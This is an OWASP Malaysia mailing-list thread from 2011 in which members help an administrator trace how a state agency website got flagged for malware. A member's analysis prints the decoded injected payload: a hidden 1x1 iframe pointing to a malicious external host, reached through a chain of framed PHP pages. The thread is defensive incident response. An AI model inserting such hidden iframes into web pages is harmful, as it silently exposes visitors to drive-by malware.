Syamsuri, nice to hear that. Can you share your blog address. Adnan good work. Hope to learn more from you.
On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <[email protected]> wrote: > Mr Adnan thanks for the info and guide.. > > I have clean all the mess and the site is up and running again.. > > thanks to all too.. > > ** I will blog this so others can make it as a guide... > > > On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor < > [email protected]> wrote: > >> mamp <= LOL typo.. it should be nano >> js <= one of hte binary in Spidermonkey. get the patched version >> http://blog.didierstevens.com/programs/spidermonkey/ and if you are >> working on MacOS/Darwin, apply this patch >> >> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/ >> >> thanks >> >> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan >> <[email protected]> wrote: >> > I can see 2 interesting apps/scripts: >> > >> > 1. mamp >> > 2. /opt/analysis/js/js >> > >> > care to share? hopefully it is open source ;) >> > >> > >> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor >> > <[email protected]> wrote: >> >> >> >> Here is my bash history: >> >> >> >> xanda:tmp adnan$ history >> >> <snip> >> >> 500 cd /tmp >> >> 501 wget http:/www2.pkink.gov.my/indexsedc.php >> >> 502 wget http://www2.pkink.gov.my/indexsedc.php >> >> 503 nano indexsedc.php >> >> 504 wget http://www2.pkink.gov.my/indexsedc.php >> >> 505 mamp indexsedc.php.1 >> >> 506 nano indexsedc.php.1 >> >> 507 wget http://www2.pkink.gov.my/sedc.php >> >> 508 nano sedc.php >> >> 509 wget http://www2.pkink.gov.my/default.php >> >> 510 nano default.php >> >> 511 nano default.php >> >> 512 clear >> >> <I've remove tags and leave clean JavaScript inside> >> >> 513 mv default.php default.txt >> >> 514 /opt/analysis/js/js < default.txt >> >> 515 cat write.log >> >> 516 history >> >> xanda:tmp adnan$ >> >> >> >> Below is the output of the cat: >> >> [output] >> >> xanda:tmp adnan$ cat write.log >> >> <iframe width="1" height="1" >> >> >> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== >> "></iframe>"<iframe >> >> width="1" height="1" >> >> >> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== >> "></iframe>" >> >> [/output] >> >> >> >> >> >> Hint: you might use modified version of spidermonkey to 'understand' >> >> the javascript >> >> >> >> Thanks >> >> >> >> On 8 February 2011 17:38, Mohd Syamsuri <[email protected]> wrote: >> >> > thanks for the info.. >> >> > i will check all the file. >> >> > >> >> > how you found it? >> >> > >> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor >> >> > <[email protected]> wrote: >> >> >> >> >> >> Here is the flow: >> >> >> >> >> >> 1) your indexsedc.php has an iframe to sedc.php >> >> >> 2) and your sedc.php has an iframe to default.php >> >> >> 3) and in default.php (look at the last 2 lines), javascript will >> >> >> actually create an iframe to >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== >> >> >> >> >> >> thanks :) >> >> >> >> >> >> On 8 February 2011 17:07, Mohd Syamsuri <[email protected]> >> wrote: >> >> >> > can you point... >> >> >> > my index.htm or indexsedc.php or other file? >> >> >> > >> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor >> >> >> > <[email protected]> wrote: >> >> >> >> >> >> >> >> you have iframe pointed to >> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== >> >> >> >> >> >> >> >> which is not xss :) >> >> >> >> >> >> >> >> >From my personal point of view, its either caused by: >> >> >> >> 1) malware on pc which has been used for ftp/access to the server >> >> >> >> 2) compromised server >> >> >> >> >> >> >> >> you can send your access.log to [email protected] or >> >> >> >> [email protected] for further analysis :) >> >> >> >> >> >> >> >> thanks >> >> >> >> >> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <[email protected]> >> wrote: >> >> >> >> > I have check it. >> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <[email protected] >> > >> >> >> >> > wrote: >> >> >> >> >> >> >> >> >> >> Hi Mohd Symsuri, >> >> >> >> >> >> >> >> >> >> Why dont you check on the reason why its being blocked, it >> might >> >> >> >> >> help. >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/ >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788 >> >> >> >> >> >> >> >> >> >> Regards, >> >> >> >> >> Kishur >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri >> >> >> >> >> <[email protected]> >> >> >> >> >> wrote: >> >> >> >> >>> >> >> >> >> >>> Assalamualikum and Good day for my fellow friends. >> >> >> >> >>> I need some advise. >> >> >> >> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan >> >> >> >> >>> (http://www.pkink.gov.my) have been blocked by Google for >> almost >> >> >> >> >>> 4 >> >> >> >> >>> days. >> >> >> >> >>> It said that we host malware on our server Malware Detected! >> ( >> >> >> >> >>> Google >> >> >> >> >>> said that!!) >> >> >> >> >>> What i did is.. >> >> >> >> >>> 1. Scan all the data and upload a new data >> >> >> >> >>> 2. Check the index.html or index.php >> >> >> >> >>> 3. Scan using web scanner using >> >> >> >> >>> http://www.avgthreatlabs.com/ >> >> >> >> >>> http://www.virustotal.com >> >> >> >> >>> but still get block.. >> >> >> >> >>> Googel said Suspected injected code >> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"; >> >> >> >> >>> NAME="confcontent" >> >> >> >> >>> scrolling=yes > >> >> >> >> >>> I have using this code for almost 2 years >> >> >> >> >>> What should i do now? >> >> >> >> >>> >> >> >> >> >>> -- >> >> >> >> >>> best regard >> >> >> >> >>> syamsuri >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> >>> _______________________________________________ >> >> >> >> >>> Owasp-Malaysia mailing list >> >> >> >> >>> [email protected] >> >> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> >> >> >>> >> >> >> >> >>> OWASP Malaysia Wiki >> >> >> >> >>> http://www.owasp.org/index.php/Malaysia >> >> >> >> >>> >> >> >> >> >>> OWASP Malaysia Wiki Facebook >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> >>> >> >> >> >> >>> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> _______________________________________________ >> >> >> >> >> Owasp-Malaysia mailing list >> >> >> >> >> [email protected] >> >> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> >> >> >> >> >> >> >> >> OWASP Malaysia Wiki >> >> >> >> >> http://www.owasp.org/index.php/Malaysia >> >> >> >> >> >> >> >> >> >> OWASP Malaysia Wiki Facebook >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> >> >> >> > >> >> >> >> > >> >> >> >> > >> >> >> >> > -- >> >> >> >> > best regard >> >> >> >> > syamsuri >> >> >> >> > >> >> >> >> > >> >> >> >> > >> >> >> >> > _______________________________________________ >> >> >> >> > Owasp-Malaysia mailing list >> >> >> >> > [email protected] >> >> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> >> >> > >> >> >> >> > OWASP Malaysia Wiki >> >> >> >> > http://www.owasp.org/index.php/Malaysia >> >> >> >> > >> >> >> >> > OWASP Malaysia Wiki Facebook >> >> >> >> > >> >> >> >> > >> >> >> >> > >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> >> >> >> > >> >> >> >> _______________________________________________ >> >> >> >> Owasp-Malaysia mailing list >> >> >> >> [email protected] >> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> >> >> >> >> >> >> OWASP Malaysia Wiki >> >> >> >> http://www.owasp.org/index.php/Malaysia >> >> >> >> >> >> >> >> OWASP Malaysia Wiki Facebook >> >> >> >> >> >> >> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> >> >> > >> >> >> > >> >> >> > >> >> >> > -- >> >> >> > best regard >> >> >> > syamsuri >> >> >> > >> >> >> > >> >> >> > >> >> >> > _______________________________________________ >> >> >> > Owasp-Malaysia mailing list >> >> >> > [email protected] >> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> >> > >> >> >> > OWASP Malaysia Wiki >> >> >> > http://www.owasp.org/index.php/Malaysia >> >> >> > >> >> >> > OWASP Malaysia Wiki Facebook >> >> >> > >> >> >> > >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> >> >> > >> >> >> _______________________________________________ >> >> >> Owasp-Malaysia mailing list >> >> >> [email protected] >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> >> >> >> >> OWASP Malaysia Wiki >> >> >> http://www.owasp.org/index.php/Malaysia >> >> >> >> >> >> OWASP Malaysia Wiki Facebook >> >> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> >> > >> >> > >> >> > >> >> > -- >> >> > best regard >> >> > syamsuri >> >> > >> >> > >> >> > >> >> > _______________________________________________ >> >> > Owasp-Malaysia mailing list >> >> > [email protected] >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> > >> >> > OWASP Malaysia Wiki >> >> > http://www.owasp.org/index.php/Malaysia >> >> > >> >> > OWASP Malaysia Wiki Facebook >> >> > >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> >> > >> >> _______________________________________________ >> >> Owasp-Malaysia mailing list >> >> [email protected] >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> >> >> OWASP Malaysia Wiki >> >> http://www.owasp.org/index.php/Malaysia >> >> >> >> OWASP Malaysia Wiki Facebook >> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> > >> > >> > >> > -- >> > Sharuzzaman Ahmat Raslan >> > >> > _______________________________________________ >> > Owasp-Malaysia mailing list >> > [email protected] >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> > >> > OWASP Malaysia Wiki >> > http://www.owasp.org/index.php/Malaysia >> > >> > OWASP Malaysia Wiki Facebook >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> > >> _______________________________________________ >> Owasp-Malaysia mailing list >> [email protected] >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> OWASP Malaysia Wiki >> http://www.owasp.org/index.php/Malaysia >> >> OWASP Malaysia Wiki Facebook >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> > > > > -- > best regard > syamsuri > > > > _______________________________________________ > Owasp-Malaysia mailing list > [email protected] > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > > OWASP Malaysia Wiki > http://www.owasp.org/index.php/Malaysia > > OWASP Malaysia Wiki Facebook > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >
_______________________________________________ Owasp-Malaysia mailing list [email protected] https://lists.owasp.org/mailman/listinfo/owasp-malaysia OWASP Malaysia Wiki http://www.owasp.org/index.php/Malaysia OWASP Malaysia Wiki Facebook http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
